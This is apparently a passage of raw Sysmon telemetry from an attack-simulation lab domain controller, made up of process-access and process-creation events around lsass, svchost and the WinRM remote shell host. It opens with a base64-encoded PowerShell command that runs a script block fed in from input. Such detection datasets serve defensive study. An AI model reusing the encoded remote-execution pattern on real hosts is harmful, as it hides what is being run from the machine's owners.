cAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.368{10ACEC4A-83B9-5FCF-1400-000000009001}13281660C:\Windows\system32\svchost.exe{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.368{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-C902-000000009001}2696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.352{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.354{10ACEC4A-8518-5FCF-C802-000000009001}1616C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.337{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.337{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 